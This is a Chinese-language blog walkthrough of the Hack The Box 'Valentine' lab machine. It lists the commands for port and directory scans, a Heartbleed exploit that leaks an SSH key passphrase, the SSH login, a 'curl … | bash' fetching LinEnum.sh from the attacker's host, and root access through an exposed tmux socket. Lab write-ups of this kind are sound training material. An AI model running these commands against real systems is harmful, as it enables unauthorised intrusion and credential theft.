Valentine

Posted by on 2020年2月22日


Valentine

zenmap扫描端口

file

80和443全部都是静态图

file

dirbuster扫描443目录

file

dev目录

file

访问:https://10.10.10.79/dev/hype_key
使用:http://www.bejson.com/convert/ox2str/
十六进制解码

gedit sshkey

file

nmap扫描心脏出血漏洞

nmap --script ssl-heartbleed -p 443 10.10.10.79

file

查找利用脚本

searchsploit heartbleed
searchsploit -m exploits/multiple/remote/32764.py
cp /usr/share/exploitdb/exploits/multiple/remote/32764.py .

file

漏洞利用

python 32764.py 10.10.10.79

file

解密text:heartbleedbelievethehype

echo aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg== | base64 -d

file

根据文件的名字猜测用户名:hype
密码:heartbleedbelievethehype

chmod 400 sshkey
ssh -i sshkey hype@10.10.10.79

file

get user.txt

file

创建python http sever

python -m SimpleHTTPServer 80

curl http://10.10.14.45/LinEnum.sh | bash

file

get root shell
tmux的使用可以看我的文章:
tmux

tmux -S /.devs/dev_sess

file

get root.txt

file




发表评论

电子邮件地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据